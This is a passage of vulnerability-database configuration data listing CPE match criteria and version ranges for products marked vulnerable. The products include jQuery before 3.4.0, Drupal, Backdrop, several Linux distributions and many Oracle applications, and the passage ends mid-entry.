{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "D2D193C7-2259-492F-8B85-E74C57A7426A", versionEndExcluding: "3.4.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", matchCriteriaId: "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "FC5AB839-4DAC-45E7-9D0B-B528F6D12043", versionEndExcluding: "7.66", versionStartIncluding: "7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "9106BF81-B898-4EB0-B63C-9919D3B22260", versionEndExcluding: "8.5.15", versionStartIncluding: "8.5.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "9B37281E-9B44-42A5-AE0A-17CE6770995C", versionEndExcluding: "8.6.15", versionStartIncluding: "8.6.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*", matchCriteriaId: "E75C32CE-3FA9-4DC2-A22A-4A841D4911EB", versionEndExcluding: "1.11.9", versionStartIncluding: "1.11.0", vulnerable: true, }, { criteria: "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*", matchCriteriaId: "F6F204D6-2C8A-4517-8E3C-328ED0D9D3E4", versionEndExcluding: "1.12.6", versionStartIncluding: "1.12.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*", matchCriteriaId: "DC1BD7B7-6D88-42B8-878E-F1318CA5FCAF", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", matchCriteriaId: "D100F7CE-FC64-4CC6-852A-6136D72DA419", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", matchCriteriaId: "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", matchCriteriaId: "40513095-7E6E-46B3-B604-C926F1BA3568", vulnerable: true, }, { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B9273745-6408-4CD3-94E8-9385D4F5FE69", versionEndIncluding: "3.1.3", versionStartIncluding: "3.0", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:*", matchCriteriaId: "04AC556D-D511-4C4C-B9FB-A089BB2FEFD5", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:*", matchCriteriaId: "9FA1A18F-D997-4121-A01B-FD9B3BF266CF", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:*", matchCriteriaId: "230E2167-9107-4994-8328-295575E17DF6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*", matchCriteriaId: "900D2344-5160-42A0-8C49-36DBC7FF3D87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA4B21-1BA9-4ED8-B9EA-558AF8655D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9C3F9EE5-FCFC-45B8-9F57-C05D42EE0FF0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*", matchCriteriaId: "90CFEC52-A574-493E-A2AC-0EC21851BBFA", versionEndExcluding: "19.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3665B8A2-1F1A-490F-B01D-5B3455A6A539", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A8577D60-A711-493D-9246-E49D0E2B07E0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", matchCriteriaId: "17EA8B91-7634-4636-B647-1049BA7CA088", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5B4DF46F-DBCC-41F2-A260-F83A14838F23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:*", matchCriteriaId: "5E5BC0B6-0C66-4FC5-81F0-6AC9BEC0813E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10F17843-32EA-4C31-B65C-F424447BEF7B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:*", matchCriteriaId: "C784CEE8-F071-4583-A72D-F46C7C95FEC0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", matchCriteriaId: "BBE7BF09-B89C-4590-821E-6C0587E096B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", matchCriteriaId: "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", matchCriteriaId: "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", matchCriteriaId: "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", matchCriteriaId: "18127694-109C-4E7E-AE79-0BA351849291", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", matchCriteriaId: "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:*", matchCriteriaId: "660DB443-6250-4956-ABD1-C6A522B8DCCA", versionEndIncluding: "2.8.0", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3625D477-1338-46CB-90B1-7291D617DC39", versionEndIncluding: "2.10.0", versionStartIncluding: "2.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "5CD806C1-CC17-47BD-8BB0-9430C4253BC7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9DC56004-4497-4CDD-AE76-5E3DFAE170F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "274A0CF5-41E8-42E0-9931-F7372A65B9C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*", matchCriteriaId: "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "55D98C27-734F-490B-92D5-251805C841B9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A9317C01-22AA-452B-BBBF-5FAFFFB8BEA4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*", matchCriteriaId: "C4534CF9-D9FD-4936-9D8C-077387028A05", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*", matchCriteriaId: "D60384BD-284C-4A68-9EEF-0FAFDF0C21F3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "FCA44E38-EB8C-4E2D-8611-B201F47520E9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", matchCriteriaId: "1A0E3537-CB5A-40BF-B42C-CED9211B8892", versionEndIncluding: "16.4.0", versionStartIncluding: "16.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "0C57FD3A-0CC1-4BA9-879A-8C4A40234162", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "698FB6D0-B26F-4760-9B9B-1C65FBFF2126", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "4F1D64BC-17BF-4DAE-B5FC-BC41F9C12DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:*", matchCriteriaId: "4E16A16E-BFA3-4D17-9B4E-B42ADE725356", versionEndIncluding: "6.4", versionStartIncluding: "6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "9264AF8A-3819-40E5-BBCB-3B6C95A0D828", versionEndIncluding: "4.3", versionStartIncluding: "4.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*", matchCriteriaId: "D52F557F-D0A0-43D3-85F1-F10B6EBFAEDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:*", matchCriteriaId: "E3517A27-E6EE-497C-9996-F78171BBE90F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1C3CE8D5-6404-4CEB-953E-7B7961BC14D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "DB43DFD4-D058-4001-BD19-488E059F4532", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "086E2E5C-44EB-4C07-B298-C04189533996", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "AA77B994-3872-4059-854B-0974AA5593D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "5682DAEB-3810-4541-833A-568C868BCE0B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "01BC9AED-F81D-4344-AD97-EEF19B6EA8C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "8198E762-9AD9-452B-B1AF-516E52436B7D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:*", matchCriteriaId: "D0D177F6-25D9-4696-8528-3F57D91BAC12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "539DA24F-E3E0-4455-84C6-A9D96CD601B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:*", matchCriteriaId: "80B6D265-9D72-45C3-AA2C-5B186E23CDAF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", matchCriteriaId: "AB654DFA-FEF9-4D00-ADB0-F3F2B6ACF13E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "37209C6F-EF99-4D21-9608-B3A06D283D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA", versionEndIncluding: "7.3.5", versionStartIncluding: "7.3.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "FA699B16-5100-4485-9BB7-85B247743B17", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "A7E00BA1-E643-45D9-97D3-EF12C29DB262", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "703DA91D-3440-4C67-AA20-78F71B1376DD", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "9CB2A0EB-E1C7-4206-8E64-D2EE77C1CD86", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "A180039F-22C3-458E-967D-E07C61C69FAF", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "2C5F6B8C-2044-4E68-98BD-37B0CD108434", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:*", matchCriteriaId: "73E05211-8415-42FB-9B93-959EB03B090B", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "7DEE0A37-6B9A-43FE-B3E0-8AB5CA368425", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "CF6A5433-A7D9-4521-9D28-E7684FB76E5B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*", matchCriteriaId: "AC15899F-8528-4D10-8CD5-F67121D7F293", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "30657F1B-D1FC-4EE6-9854-18993294A01D", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:*", matchCriteriaId: "30F0991A-8507-48C4-9A8E-DE5B28C46A99", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00ED7CB0-96F7-4089-9047-A3AC241139C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "005E458D-4059-4E20-A620-B25DEBCE40C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "74008AEE-589F-423E-8D77-EA54C36D776A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "FD85DB06-692F-4E81-BEB7-1E41B438D1FD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "DB6C521C-F104-4E26-82F2-6F63F94108BC", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "402B8642-7ACC-4F42-87A9-AB4D3B581751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:*", matchCriteriaId: "2163B848-D684-4B17-969A-36E0866C5749", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "00615085-65B2-4211-A766-551842B3356F", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "51DB64CA-8953-43BB-AEA9-D0D7E91E9FE3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "669BA301-4D29-4692-823B-CDEDD2A5BD18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "419559E6-5441-4335-8FE1-6ADAAD9355DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "036E4450-53C6-4322-9C7D-91DA94C9A3C9", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:*", matchCriteriaId: "89C26226-A3CF-4D36-BBDA-80E298E0A51F", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "F67D1332-621E-4756-B205-97A5CF670A19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6748C867-0A52-452B-B4D6-DA80396F4152", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A64B5C4C-DF69-4292-A534-EDC5955CDDAE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C7141C66-0384-4BA1-A788-91DEB7EF1361", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "06E586B3-3434-4B08-8BE3-16C528642CA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*", matchCriteriaId: "4EFC8DAB-E5D8-420C-B800-08F8C5BF3F4F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A5ACB1D2-69CE-4B7D-9B51-D8F80E541631", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:*", matchCriteriaId: "B1F726C6-EA5A-40FF-8809-4F48E4AE6976", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:*", matchCriteriaId: "CD7C26E3-BB0D-4218-8176-319AEA2925C8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:*", matchCriteriaId: "DD67072F-3CFC-480D-9360-81A05D523318", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:*", matchCriteriaId: "652E762A-BCDD-451E-9DE3-F1555C1E4B16", vulnerable: true, }, { criteria: 